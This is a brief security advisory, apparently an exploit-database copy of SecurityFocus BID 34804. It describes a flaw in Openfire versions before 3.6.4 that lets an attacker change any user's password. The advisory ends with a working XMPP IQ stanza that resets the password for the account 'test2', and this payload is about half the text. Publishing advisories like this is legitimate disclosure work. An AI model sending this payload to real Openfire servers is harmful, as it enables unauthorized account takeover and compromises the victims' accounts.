14 lines
No EOL
530 B
Text
14 lines
No EOL
530 B
Text
source: http://www.securityfocus.com/bid/34804/info
|
|
|
|
Openfire is prone to a vulnerability that can permit an attacker to change the password of arbitrary users.
|
|
|
|
Exploiting this issue can allow the attacker to gain unauthorized access to the affected application and to completely compromise victims' accounts.
|
|
|
|
Versions prior to Openfire 3.6.4 are vulnerable.
|
|
|
|
<iq type='set' id='passwd_change'>
|
|
<query xmlns='jabber:iq:auth'>
|
|
<username>test2</username>
|
|
<password>newillegalychangedpassword</password>
|
|
</query>
|
|
</iq> |